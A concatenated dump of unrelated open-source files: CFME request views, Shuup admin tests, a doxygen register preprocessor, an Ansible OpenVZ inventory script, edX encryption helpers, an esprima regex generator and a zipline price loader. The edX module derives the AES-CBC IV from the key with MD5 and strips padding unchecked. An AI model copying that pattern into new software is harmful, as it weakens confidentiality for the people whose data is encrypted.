class properties(WaitTab): # noqa
instance_type = SummaryFormItem('Properties', 'Instance Type')
boot_disk_size = SummaryFormItem('Properties', 'Boot Disk Size ')
is_preemptible = Checkbox(name='hardware__is_preemptible')
@View.nested
class customize(WaitTab): # noqa
username = SummaryFormItem('Credentials', 'Username')
ip_mode = SummaryFormItem('IP Address Information', 'Address Mode')
hostname = SummaryFormItem('IP Address Information', 'Address Mode')
subnet_mask = SummaryFormItem('IP Address Information', 'Subnet Mask')
gateway = SummaryFormItem('IP Address Information', 'Gateway')
dns_server_list = SummaryFormItem('DNS', 'DNS Server list')
dns_suffix_list = SummaryFormItem('DNS', 'DNS Suffix list')
subnet_mask = SummaryFormItem('IP Address Information', 'Subnet Mask')
customize_template = SummaryFormItem('Customize Template', 'Script Name')
@View.nested
class schedule(WaitTab): # noqa
when_provision = SummaryFormItem('Schedule Info', 'When to Provision')
stateless = Checkbox(name='shedule__stateless')
power_on = SummaryFormItem('Lifespan', 'Power on virtual machines after creation')
retirement = SummaryFormItem('Lifespan', 'Time until Retirement')
retirement_warning = SummaryFormItem('Lifespan', 'Retirement Warning')
@property
def is_displayed(self):
expected_description = self.context['object'].rest.description
return (
self.in_requests and
self.breadcrumb.locations[-1] == expected_description and
self.title.text == expected_description
)
breadcrumb = BreadCrumb()
toolbar = RequestDetailsToolBar()
class RequestApprovalView(RequestDetailsView):
reason = Input(name='reason')
submit = Button(title='Submit')
cancel = Button(title="Cancel this provisioning request")
@property
def is_displayed(self):
try:
return (
self.breadcrumb.locations[-1] == 'Request Approval' and
self.breadcrumb.locations[-2] == self.context['object'].rest.description
)
except Exception:
return False
class RequestDenialView(RequestDetailsView):
reason = Input(name='reason')
submit = Button(title='Submit')
cancel = Button(title="Cancel this provisioning request")
@property
def is_displayed(self):
try:
return (
self.breadcrumb.locations[-1] == 'Request Denial' and
self.breadcrumb.locations[-2] == self.context['object'].rest.description
)
except Exception:
return False
class RequestProvisionView(ProvisionView):
@View.nested
class form(BasicProvisionFormView): # noqa
submit_button = Button('Submit') # Submit for 2nd page, tabular form
cancel_button = Button('Cancel')
@property
def is_displayed(self):
try:
return self.breadcrumb.locations[-1] == self.context['object'].rest.description
except Exception:
return False
class RequestEditView(RequestProvisionView):
# BZ 1726741 will impact the breadcrumb items
is_displayed = displayed_not_implemented
# @property
# def is_displayed(self):
# try:
# return (
# self.breadcrumb.locations[-2] == self.context['object'].rest.description and
# self.breadcrumb.locations[-1] == 'Edit VM Provision')
# except Exception:
# return False
class RequestCopyView(RequestProvisionView):
# BZ 1726741 will impact the breadcrumb items
is_displayed = displayed_not_implemented
# @property
# def is_displayed(self):
# try:
# return (
# self.breadcrumb.locations[-2] == self.context['object'].rest.description and
# self.breadcrumb.locations[-1] == 'Copy of VM Provision Request')
# except Exception:
# return False
@navigator.register(RequestCollection, 'All')
class RequestAll(CFMENavigateStep):
VIEW = RequestsView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self, *args, **kwargs):
self.prerequisite_view.navigation.select('Services', 'Requests')
@navigator.register(Request, 'Details')
class RequestDetails(CFMENavigateStep):
VIEW = RequestDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self, *args, **kwargs):
try:
return self.prerequisite_view.table.row(description=self.obj.rest.description).click()
except (NameError, TypeError):
logger.warning('Exception caught, could not match Request')
@navigator.register(Request, 'Edit')
class EditRequest(CFMENavigateStep):
VIEW = RequestEditView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.edit.click()
@navigator.register(Request, 'Copy')
class CopyRequest(CFMENavigateStep):
VIEW = RequestCopyView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.copy.click()
@navigator.register(Request, 'Approve')
class ApproveRequest(CFMENavigateStep):
VIEW = RequestApprovalView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.approve.click()
@navigator.register(Request, 'Deny')
class DenyRequest(CFMENavigateStep):
VIEW = RequestDenialView
prerequisite = NavigateToSibling('Details')
def step(self, *args, **kwargs):
return self.prerequisite_view.toolbar.deny.click()
| gpl-2.0 |
hrayr-artunyan/shuup | shuup_tests/admin/test_contact_extensibility.py | 2 | 3386 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
import pytest
from bs4 import BeautifulSoup
from django.utils.encoding import force_text
from shuup.admin.modules.contacts.views.detail import ContactDetailView
from shuup.admin.modules.contacts.views.edit import ContactEditView
from shuup.apps.provides import override_provides
from shuup.testing.factories import create_random_person, get_default_shop
from shuup.testing.utils import apply_request_middleware
@pytest.mark.django_db
def test_contact_edit_has_custom_toolbar_button(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactEditView.as_view()
response = view_func(request, pk=contact.pk)
content = force_text(response.render().content)
assert "#mocktoolbarbutton" in content, 'custom toolbar button not found on edit page'
@pytest.mark.django_db
def test_contact_detail_has_custom_toolbar_button(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactDetailView.as_view()
response = view_func(request, pk=contact.pk)
content = force_text(response.render().content)
assert "#mocktoolbarbutton" in content, 'custom toolbar button not found on detail page'
@pytest.mark.django_db
def test_contact_detail_has_custom_section(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactDetailView.as_view()
response = view_func(request, pk=contact.pk)
content = force_text(response.render().content)
assert "mock section title" in content, 'custom section title not found on detail page'
assert "mock section content" in content, 'custom section content not found on detail page'
assert "mock section context data" in content, 'custom section context data not found on detail page'
@pytest.mark.django_db
def test_contact_detail_has_mocked_toolbar_action_items(rf, admin_user):
get_default_shop()
contact = create_random_person(locale="en_US", minimum_name_comp_len=5)
request = apply_request_middleware(rf.get("/"), user=admin_user)
view_func = ContactDetailView.as_view()
with override_provides("admin_contact_toolbar_action_item", [
"shuup.testing.admin_module.toolbar:MockContactToolbarActionItem"
]):
assert _check_if_mock_action_item_exists(view_func, request, contact)
with override_provides("admin_contact_toolbar_action_item", []):
assert not _check_if_mock_action_item_exists(view_func, request, contact)
def _check_if_mock_action_item_exists(view_func, request, contact):
response = view_func(request, pk=contact.pk)
soup = BeautifulSoup(response.render().content)
for dropdown_link in soup.find_all("a", {"class": "btn-default"}):
if dropdown_link.get("href", "") == "/#mocktoolbaractionitem":
return True
return False
| agpl-3.0 |
hoangt/core | core/waf/docs/register.py | 3 | 4651 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from collections import OrderedDict
from error_handler import ReportError
from doxycomment import ExtractCommentBlocks,\
IsCommentBlockStart, IsCommentBlockEnd,\
IsInCommentBlock, GetCommentBlock,\
SplitLine, BlockHandler
def ProcessRegister(lineArray, registerPosition, CommentBlocks):
startreg_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)(@|\\|/)register (?P<id>\w+)(\W*(?P<title>.*))$")
bits_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)\[(?P<bit>\d+)(:(?P<endbit>\d+))?\]\W*\((?P<name>[^)]+)\)(?P<desc>.*)$")
bitfollow_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)(?P<desc>.*)$")
endreg_ex = re.compile("^(?P<start>\W*(\*|///)?\W*)(@|\\|/)endregister\W*$")
class Proxy(object):
def __call__(self, res):
self.__res = res
return res
def __getattr__(self, name):
return getattr(self.__res,name)
class Empty(object):
pass
lines = []
curr = None
field = None
res = Proxy()
for lineNumber in range(registerPosition["Start"], registerPosition["End"]+1):
line = lineArray[lineNumber]
if not curr:
if res(startreg_ex.match(line)):
curr = Empty()
curr.id = res.group('id')
curr.title = res.group('title')
curr.start = res.group('start')
curr.bits = []
else:
lines.append(line)
else:
if res(bits_ex.match(line)):
field = Empty()
field.bit = int(res.group('bit'))
field.endbit = res.group('endbit')
field.name = res.group('name')
field.desc = res.group('desc').strip() + ' '
curr.bits.append(field)
elif res(endreg_ex.match(line)):
start = curr.start
ordered = sorted(curr.bits, key=lambda field: field.bit, reverse=True)
lines.append(start+"@anchor %s" %(curr.id))
lines.append(start+'<table class="register_view">')
lines.append(start+"<caption>%s</caption><tr>" % (curr.title))
begins = []
ends = []
ones = []
for item in ordered:
if item.endbit:
begins.append(int(item.bit))
ends.append(int(item.endbit))
else:
ones.append(int(item.bit))
if (len(begins)==0 or begins[0] != 31) and (len(ones)==0 or ones[0] != 31):
begins.append(31)
if (len(ends)==0 or ends[-1] != 0) and (len(ones)==0 or ones[-1] != 0):
ends.append(0)
for i in range(31, -1, -1):
if i in begins:
thclass = """ class="begin" """
elif i in ends:
thclass = """ class="end" """
elif i in ones:
thclass = """ class="bit" """
else:
thclass = None
if thclass:
lines.append(start+"<th%s>%d</th>" % (thclass, i))
else:
lines.append(start+"<th></th>")
index = 31
lines.append(start+"</tr><tr>")
for item in ordered:
bit = int(item.bit)
span = bit - (int(item.endbit or bit)-1)
offset = index - bit
if offset:
lines.append(start+"""<td colspan="%d" class="empty"> </td>""" % (offset))
index = int(item.endbit or bit) -1
lines.append(start+"""<td colspan="%d">%s</td>""" % (span, item.name))
if index != -1:
lines.append(start+"""<td colspan="%d" class="empty"> </td>""" % (index+1))
lines.append(start+"</tr></table>")
lines.append(start+'<table class="register_list">')
lines.append(start+"<caption>%s Description</caption>" % (curr.title))
lines.append(start+'<tr class="register_list_header"><th class="register_table_bits">Bits</th><th>Id</th><th>Description</th></tr>')
for item in ordered:
if item.endbit:
bits = "%s - %s" % (item.bit, item.endbit)
else:
bits = "%s" % (item.bit)
lines.append(start+"""<tr><td>%s</td><td>%s</td><td>%s</td></tr>""" % (bits, item.name, item.desc))
lines.append(start+"</table>")
# Put Table into lines
curr = None
elif res(bitfollow_ex.match(line)):
field.desc += res.group('desc').strip() + ' '
return lines
def RegisterHandler(lineArray, options):
return BlockHandler(lineArray, options,
StartDelimiter='@register',
EndDelimiter='@endregister',
Processor=ProcessRegister)
if __name__ == "__main__":
# Parse command line
from doxygen_preprocessor import CommandLineHandler
options, remainder = CommandLineHandler()
from filterprocessor import FilterFiles
FilterFiles([RegisterHandler,], options, remainder)
| agpl-3.0 |
wenottingham/ansible | contrib/inventory/openvz.py | 86 | 2692 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# openvz.py
#
# Copyright 2014 jordonr <jordon@beamsyn.net>
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Inspired by libvirt_lxc.py inventory script
# https://github.com/ansible/ansible/blob/e5ef0eca03cbb6c8950c06dc50d0ca22aa8902f4/plugins/inventory/libvirt_lxc.py
#
# Groups are determined by the description field of openvz guests
# multiple groups can be separated by commas: webserver,dbserver
from subprocess import Popen,PIPE
import sys
import json
#List openvz hosts
vzhosts = ['vzhost1','vzhost2','vzhost3']
#Add openvz hosts to the inventory and Add "_meta" trick
inventory = {'vzhosts': {'hosts': vzhosts}, '_meta': {'hostvars': {}}}
#default group, when description not defined
default_group = ['vzguest']
def get_guests():
#Loop through vzhosts
for h in vzhosts:
#SSH to vzhost and get the list of guests in json
pipe = Popen(['ssh', h,'vzlist','-j'], stdout=PIPE, universal_newlines=True)
#Load Json info of guests
json_data = json.loads(pipe.stdout.read())
#loop through guests
for j in json_data:
#Add information to host vars
inventory['_meta']['hostvars'][j['hostname']] = {'ctid': j['ctid'], 'veid': j['veid'], 'vpsid': j['vpsid'], 'private_path': j['private'], 'root_path': j['root'], 'ip': j['ip']}
#determine group from guest description
if j['description'] is not None:
groups = j['description'].split(",")
else:
groups = default_group
#add guest to inventory
for g in groups:
if g not in inventory:
inventory[g] = {'hosts': []}
inventory[g]['hosts'].append(j['hostname'])
return inventory
if len(sys.argv) == 2 and sys.argv[1] == '--list':
inv_json = get_guests()
print(json.dumps(inv_json, sort_keys=True))
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print(json.dumps({}))
else:
print("Need an argument, either --list or --host <host>")
| gpl-3.0 |
kuiwei/edx-platform | lms/djangoapps/verify_student/ssencrypt.py | 183 | 7000 | """
NOTE: Anytime a `key` is passed into a function here, we assume it's a raw byte
string. It should *not* be a string representation of a hex value. In other
words, passing the `str` value of
`"32fe72aaf2abb44de9e161131b5435c8d37cbdb6f5df242ae860b283115f2dae"` is bad.
You want to pass in the result of calling .decode('hex') on that, so this instead:
"'2\xfer\xaa\xf2\xab\xb4M\xe9\xe1a\x13\x1bT5\xc8\xd3|\xbd\xb6\xf5\xdf$*\xe8`\xb2\x83\x11_-\xae'"
The RSA functions take any key format that RSA.importKey() accepts, so...
An RSA public key can be in any of the following formats:
* X.509 subjectPublicKeyInfo DER SEQUENCE (binary or PEM encoding)
* PKCS#1 RSAPublicKey DER SEQUENCE (binary or PEM encoding)
* OpenSSH (textual public key only)
An RSA private key can be in any of the following formats:
* PKCS#1 RSAPrivateKey DER SEQUENCE (binary or PEM encoding)
* PKCS#8 PrivateKeyInfo DER SEQUENCE (binary or PEM encoding)
* OpenSSH (textual public key only)
In case of PEM encoding, the private key can be encrypted with DES or 3TDES
according to a certain pass phrase. Only OpenSSL-compatible pass phrases are
supported.
"""
from hashlib import md5, sha256
import base64
import binascii
import hmac
import logging
from Crypto import Random
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
log = logging.getLogger(__name__)
def encrypt_and_encode(data, key):
""" Encrypts and endcodes `data` using `key' """
return base64.urlsafe_b64encode(aes_encrypt(data, key))
def decode_and_decrypt(encoded_data, key):
""" Decrypts and decodes `data` using `key' """
return aes_decrypt(base64.urlsafe_b64decode(encoded_data), key)
def aes_encrypt(data, key):
"""
Return a version of the `data` that has been encrypted to
"""
cipher = aes_cipher_from_key(key)
padded_data = pad(data)
return cipher.encrypt(padded_data)
def aes_decrypt(encrypted_data, key):
"""
Decrypt `encrypted_data` using `key`
"""
cipher = aes_cipher_from_key(key)
padded_data = cipher.decrypt(encrypted_data)
return unpad(padded_data)
def aes_cipher_from_key(key):
"""
Given an AES key, return a Cipher object that has `encrypt()` and
`decrypt()` methods. It will create the cipher to use CBC mode, and create
the initialization vector as Software Secure expects it.
"""
return AES.new(key, AES.MODE_CBC, generate_aes_iv(key))
def generate_aes_iv(key):
"""
Return the initialization vector Software Secure expects for a given AES
key (they hash it a couple of times and take a substring).
"""
return md5(key + md5(key).hexdigest()).hexdigest()[:AES.block_size]
def random_aes_key():
return Random.new().read(32)
def pad(data):
""" Pad the given `data` such that it fits into the proper AES block size """
bytes_to_pad = AES.block_size - len(data) % AES.block_size
return data + (bytes_to_pad * chr(bytes_to_pad))
def unpad(padded_data):
""" remove all padding from `padded_data` """
num_padded_bytes = ord(padded_data[-1])
return padded_data[:-num_padded_bytes]
def rsa_encrypt(data, rsa_pub_key_str):
"""
`rsa_pub_key` is a string with the public key
"""
key = RSA.importKey(rsa_pub_key_str)
cipher = PKCS1_OAEP.new(key)
encrypted_data = cipher.encrypt(data)
return encrypted_data
def rsa_decrypt(data, rsa_priv_key_str):
"""
When given some `data` and an RSA private key, decrypt the data
"""
key = RSA.importKey(rsa_priv_key_str)
cipher = PKCS1_OAEP.new(key)
return cipher.decrypt(data)
def has_valid_signature(method, headers_dict, body_dict, access_key, secret_key):
"""
Given a message (either request or response), say whether it has a valid
signature or not.
"""
_, expected_signature, _ = generate_signed_message(
method, headers_dict, body_dict, access_key, secret_key
)
authorization = headers_dict["Authorization"]
auth_token, post_signature = authorization.split(":")
_, post_access_key = auth_token.split()
if post_access_key != access_key:
log.error("Posted access key does not match ours")
log.debug("Their access: %s; Our access: %s", post_access_key, access_key)
return False
if post_signature != expected_signature:
log.error("Posted signature does not match expected")
log.debug("Their sig: %s; Expected: %s", post_signature, expected_signature)
return False
return True
def generate_signed_message(method, headers_dict, body_dict, access_key, secret_key):
"""
Returns a (message, signature) pair.
"""
message = signing_format_message(method, headers_dict, body_dict)
# hmac needs a byte string for it's starting key, can't be unicode.
hashed = hmac.new(secret_key.encode('utf-8'), message, sha256)
signature = binascii.b2a_base64(hashed.digest()).rstrip('\n')
authorization_header = "SSI {}:{}".format(access_key, signature)
message += '\n'
return message, signature, authorization_header
def signing_format_message(method, headers_dict, body_dict):
"""
Given a dictionary of headers and a dictionary of the JSON for the body,
will return a str that represents the normalized version of this messsage
that will be used to generate a signature.
"""
headers_str = "{}\n\n{}".format(method, header_string(headers_dict))
body_str = body_string(body_dict)
message = headers_str + body_str
return message
def header_string(headers_dict):
"""Given a dictionary of headers, return a canonical string representation."""
header_list = []
if 'Content-Type' in headers_dict:
header_list.append(headers_dict['Content-Type'] + "\n")
if 'Date' in headers_dict:
header_list.append(headers_dict['Date'] + "\n")
if 'Content-MD5' in headers_dict:
header_list.append(headers_dict['Content-MD5'] + "\n")
return "".join(header_list) # Note that trailing \n's are important
def body_string(body_dict, prefix=""):
"""
Return a canonical string representation of the body of a JSON request or
response. This canonical representation will be used as an input to the
hashing used to generate a signature.
"""
body_list = []
for key, value in sorted(body_dict.items()):
if isinstance(value, (list, tuple)):
for i, arr in enumerate(value):
if isinstance(arr, dict):
body_list.append(body_string(arr, u"{}.{}.".format(key, i)))
else:
body_list.append(u"{}.{}:{}\n".format(key, i, arr).encode('utf-8'))
elif isinstance(value, dict):
body_list.append(body_string(value, key + ":"))
else:
if value is None:
value = "null"
body_list.append(u"{}{}:{}\n".format(prefix, key, value).encode('utf-8'))
return "".join(body_list) # Note that trailing \n's are important
| agpl-3.0 |
dxuehu/cartero | test/example2/node_modules/browserify-shim/node_modules/rename-function-calls/node_modules/detective/node_modules/esprima-six/tools/generate-unicode-regex.py | 341 | 5096 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# By Yusuke Suzuki <utatane.tea@gmail.com>
# Modified by Mathias Bynens <http://mathiasbynens.be/>
# http://code.google.com/p/esprima/issues/detail?id=110
import sys
import string
import re
class RegExpGenerator(object):
def __init__(self, detector):
self.detector = detector
def generate_identifier_start(self):
r = [ ch for ch in range(0xFFFF + 1) if self.detector.is_identifier_start(ch)]
return self._generate_range(r)
def generate_identifier_part(self):
r = [ ch for ch in range(0xFFFF + 1) if self.detector.is_identifier_part(ch)]
return self._generate_range(r)
def generate_non_ascii_identifier_start(self):
r = [ ch for ch in xrange(0x0080, 0xFFFF + 1) if self.detector.is_identifier_start(ch)]
return self._generate_range(r)
def generate_non_ascii_identifier_part(self):
r = [ ch for ch in range(0x0080, 0xFFFF + 1) if self.detector.is_identifier_part(ch)]
return self._generate_range(r)
def generate_non_ascii_separator_space(self):
r = [ ch for ch in range(0x0080, 0xFFFF + 1) if self.detector.is_separator_space(ch)]
return self._generate_range(r)
def _generate_range(self, r):
if len(r) == 0:
return '[]'
buf = []
start = r[0]
end = r[0]
predict = start + 1
r = r[1:]
for code in r:
if predict == code:
end = code
predict = code + 1
continue
else:
if start == end:
buf.append("\\u%04X" % start)
elif end == start + 1:
buf.append("\\u%04X\\u%04X" % (start, end))
else:
buf.append("\\u%04X-\\u%04X" % (start, end))
start = code
end = code
predict = code + 1
if start == end:
buf.append("\\u%04X" % start)
else:
buf.append("\\u%04X-\\u%04X" % (start, end))
return '[' + ''.join(buf) + ']'
class Detector(object):
def __init__(self, data):
self.data = data
def is_ascii(self, ch):
return ch < 0x80
def is_ascii_alpha(self, ch):
v = ch | 0x20
return v >= ord('a') and v <= ord('z')
def is_decimal_digit(self, ch):
return ch >= ord('0') and ch <= ord('9')
def is_octal_digit(self, ch):
return ch >= ord('0') and ch <= ord('7')
def is_hex_digit(self, ch):
v = ch | 0x20
return self.is_decimal_digit(c) or (v >= ord('a') and v <= ord('f'))
def is_digit(self, ch):
return self.is_decimal_digit(ch) or self.data[ch] == 'Nd'
def is_ascii_alphanumeric(self, ch):
return self.is_decimal_digit(ch) or self.is_ascii_alpha(ch)
def _is_non_ascii_identifier_start(self, ch):
c = self.data[ch]
return c == 'Lu' or c == 'Ll' or c == 'Lt' or c == 'Lm' or c == 'Lo' or c == 'Nl'
def _is_non_ascii_identifier_part(self, ch):
c = self.data[ch]
return c == 'Lu' or c == 'Ll' or c == 'Lt' or c == 'Lm' or c == 'Lo' or c == 'Nl' or c == 'Mn' or c == 'Mc' or c == 'Nd' or c == 'Pc' or ch == 0x200C or ch == 0x200D
def is_separator_space(self, ch):
return self.data[ch] == 'Zs'
def is_white_space(self, ch):
return ch == ord(' ') or ch == ord("\t") or ch == 0xB or ch == 0xC or ch == 0x00A0 or ch == 0xFEFF or self.is_separator_space(ch)
def is_line_terminator(self, ch):
return ch == 0x000D or ch == 0x000A or self.is_line_or_paragraph_terminator(ch)
def is_line_or_paragraph_terminator(self, ch):
return ch == 0x2028 or ch == 0x2029
def is_identifier_start(self, ch):
if self.is_ascii(ch):
return ch == ord('$') or ch == ord('_') or ch == ord('\\') or self.is_ascii_alpha(ch)
return self._is_non_ascii_identifier_start(ch)
def is_identifier_part(self, ch):
if self.is_ascii(ch):
return ch == ord('$') or ch == ord('_') or ch == ord('\\') or self.is_ascii_alphanumeric(ch)
return self._is_non_ascii_identifier_part(ch)
def analyze(source):
data = []
dictionary = {}
with open(source) as uni:
flag = False
first = 0
for line in uni:
d = string.split(line.strip(), ";")
val = int(d[0], 16)
if flag:
if re.compile("<.+, Last>").match(d[1]):
# print "%s : u%X" % (d[1], val)
flag = False
for t in range(first, val+1):
dictionary[t] = str(d[2])
else:
raise "Database Exception"
else:
if re.compile("<.+, First>").match(d[1]):
# print "%s : u%X" % (d[1], val)
flag = True
first = val
else:
dictionary[val] = str(d[2])
for i in range(0xFFFF + 1):
if dictionary.get(i) == None:
data.append("Un")
else:
data.append(dictionary[i])
return RegExpGenerator(Detector(data))
def main(source):
generator = analyze(source)
print generator.generate_non_ascii_identifier_start()
print generator.generate_non_ascii_identifier_part()
print generator.generate_non_ascii_separator_space()
if __name__ == '__main__':
main(sys.argv[1])
| mit |
umuzungu/zipline | zipline/data/us_equity_loader.py | 3 | 11226 | # Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import (
ABCMeta,
abstractmethod,
abstractproperty,
)
from cachetools import LRUCache
from numpy import around, hstack
from pandas.tslib import normalize_date
from six import with_metaclass
from zipline.lib._float64window import AdjustedArrayWindow as Float64Window
from zipline.lib.adjustment import Float64Multiply
from zipline.utils.cache import ExpiringCache
from zipline.utils.memoize import lazyval
from zipline.utils.numpy_utils import float64_dtype
class SlidingWindow(object):
"""
Wrapper around an AdjustedArrayWindow which supports monotonically
increasing (by datetime) requests for a sized window of data.
Parameters
----------
window : AdjustedArrayWindow
Window of pricing data with prefetched values beyond the current
simulation dt.
cal_start : int
Index in the overall calendar at which the window starts.
"""
def __init__(self, window, size, cal_start, offset):
self.window = window
self.cal_start = cal_start
self.current = around(next(window), 3)
self.offset = offset
self.most_recent_ix = self.cal_start + size
def get(self, end_ix):
"""
Returns
-------
out : A np.ndarray of the equity pricing up to end_ix after adjustments
and rounding have been applied.
"""
if self.most_recent_ix == end_ix:
return self.current
target = end_ix - self.cal_start - self.offset + 1
self.current = around(self.window.seek(target), 3)
self.most_recent_ix = end_ix
return self.current
class USEquityHistoryLoader(with_metaclass(ABCMeta)):
"""
Loader for sliding history windows of adjusted US Equity Pricing data.
Parameters
----------
reader : DailyBarReader, MinuteBarReader
Reader for pricing bars.
adjustment_reader : SQLiteAdjustmentReader
Reader for adjustment data.
"""
FIELDS = ('open', 'high', 'low', 'close', 'volume')
def __init__(self, env, reader, adjustment_reader, sid_cache_size=1000):
self.env = env
self._reader = reader
self._adjustments_reader = adjustment_reader
self._window_blocks = {
field: ExpiringCache(LRUCache(maxsize=sid_cache_size))
for field in self.FIELDS
}
@abstractproperty
def _prefetch_length(self):
pass
@abstractproperty
def _calendar(self):
pass
@abstractmethod
def _array(self, start, end, assets, field):
pass
def _get_adjustments_in_range(self, asset, dts, field):
"""
Get the Float64Multiply objects to pass to an AdjustedArrayWindow.
For the use of AdjustedArrayWindow in the loader, which looks back
from current simulation time back to a window of data the dictionary is
structured with:
- the key into the dictionary for adjustments is the location of the
day from which the window is being viewed.
- the start of all multiply objects is always 0 (in each window all
adjustments are overlapping)
- the end of the multiply object is the location before the calendar
location of the adjustment action, making all days before the event
adjusted.
Parameters
----------
asset : Asset
The assets for which to get adjustments.
days : iterable of datetime64-like
The days for which adjustment data is needed.
field : str
OHLCV field for which to get the adjustments.
Returns
-------
out : The adjustments as a dict of loc -> Float64Multiply
"""
sid = int(asset)
start = normalize_date(dts[0])
end = normalize_date(dts[-1])
adjs = {}
if field != 'volume':
mergers = self._adjustments_reader.get_adjustments_for_sid(
'mergers', sid)
for m in mergers:
dt = m[0]
if start < dt <= end:
end_loc = dts.searchsorted(dt)
mult = Float64Multiply(0,
end_loc - 1,
0,
0,
m[1])
try:
adjs[end_loc].append(mult)
except KeyError:
adjs[end_loc] = [mult]
divs = self._adjustments_reader.get_adjustments_for_sid(
'dividends', sid)
for d in divs:
dt = d[0]
if start < dt <= end:
end_loc = dts.searchsorted(dt)
mult = Float64Multiply(0,
end_loc - 1,
0,
0,
d[1])
try:
adjs[end_loc].append(mult)
except KeyError:
adjs[end_loc] = [mult]
splits = self._adjustments_reader.get_adjustments_for_sid(
'splits', sid)
for s in splits:
dt = s[0]
if field == 'volume':
ratio = 1.0 / s[1]
else:
ratio = s[1]
if start < dt <= end:
end_loc = dts.searchsorted(dt)
mult = Float64Multiply(0,
end_loc - 1,
0,
0,
ratio)
try:
adjs[end_loc].append(mult)
except KeyError:
adjs[end_loc] = [mult]
return adjs
def _ensure_sliding_windows(self, assets, dts, field):
"""
Ensure that there is a Float64Multiply window for each asset that can
provide data for the given parameters.
If the corresponding window for the (assets, len(dts), field) does not
exist, then create a new one.
If a corresponding window does exist for (assets, len(dts), field), but
can not provide data for the current dts range, then create a new
one and replace the expired window.
Parameters
----------
assets : iterable of Assets
The assets in the window
dts : iterable of datetime64-like
The datetimes for which to fetch data.
Makes an assumption that all dts are present and contiguous,
in the calendar.
field : str
The OHLCV field for which to retrieve data.
Returns
-------
out : list of Float64Window with sufficient data so that each asset's
window can provide `get` for the index corresponding with the last
value in `dts`
"""
end = dts[-1]
size = len(dts)
asset_windows = {}
needed_assets = []
for asset in assets:
try:
asset_windows[asset] = self._window_blocks[field].get(
(asset, size), end)
except KeyError:
needed_assets.append(asset)
if needed_assets:
start = dts[0]
offset = 0
start_ix = self._calendar.get_loc(start)
end_ix = self._calendar.get_loc(end)
cal = self._calendar
prefetch_end_ix = min(end_ix + self._prefetch_length, len(cal) - 1)
prefetch_end = cal[prefetch_end_ix]
prefetch_dts = cal[start_ix:prefetch_end_ix + 1]
prefetch_len = len(prefetch_dts)
array = self._array(prefetch_dts, needed_assets, field)
view_kwargs = {}
if field == 'volume':
array = array.astype(float64_dtype)
for i, asset in enumerate(needed_assets):
if self._adjustments_reader:
adjs = self._get_adjustments_in_range(
asset, prefetch_dts, field)
else:
adjs = {}
window = Float64Window(
array[:, i].reshape(prefetch_len, 1),
view_kwargs,
adjs,
offset,
size
)
sliding_window = SlidingWindow(window, size, start_ix, offset)
asset_windows[asset] = sliding_window
self._window_blocks[field].set((asset, size),
sliding_window,
prefetch_end)
return [asset_windows[asset] for asset in assets]
def history(self, assets, dts, field):
"""
A window of pricing data with adjustments applied assuming that the
end of the window is the day before the current simulation time.
Parameters
----------
assets : iterable of Assets
The assets in the window.
dts : iterable of datetime64-like
The datetimes for which to fetch data.
Makes an assumption that all dts are present and contiguous,
in the calendar.
field : str
The OHLCV field for which to retrieve data.
Returns
-------
out : np.ndarray with shape(len(days between start, end), len(assets))
"""
block = self._ensure_sliding_windows(assets, dts, field)
end_ix = self._calendar.get_loc(dts[-1])
return hstack([window.get(end_ix) for window in block])
class USEquityDailyHistoryLoader(USEquityHistoryLoader):
@property
def _prefetch_length(self):
return 40
@property
def _calendar(self):
return self._reader._calendar
def _array(self, dts, assets, field):
return self._reader.load_raw_arrays(
[field],
dts[0],
dts[-1],
assets,
)[0]
class USEquityMinuteHistoryLoader(USEquityHistoryLoader):
@property
def _prefetch_length(self):
return 1560
@lazyval
def _calendar(self):
mm = self.env.market_minutes
return mm[mm.slice_indexer(start=self._reader.first_trading_day,
end=self._reader.last_available_dt)]
def _array(self, dts, assets, field):
return self._reader.load_raw_arrays(
[field],
dts[0],
dts[-1],
assets,
)[0]
| apache-2.0 |
futurulus/scipy | scipy/_lib/tests/test__gcutils.py | 109 | 2804 | """ Test for assert_deallocated context manager and gc utilities
"""
import gc
from scipy._lib._gcutils import set_gc_state, gc_state, assert_deallocated, ReferenceError
from nose.tools import assert_equal, raises
def test_set_gc_state():
gc_status = gc.isenabled()
try:
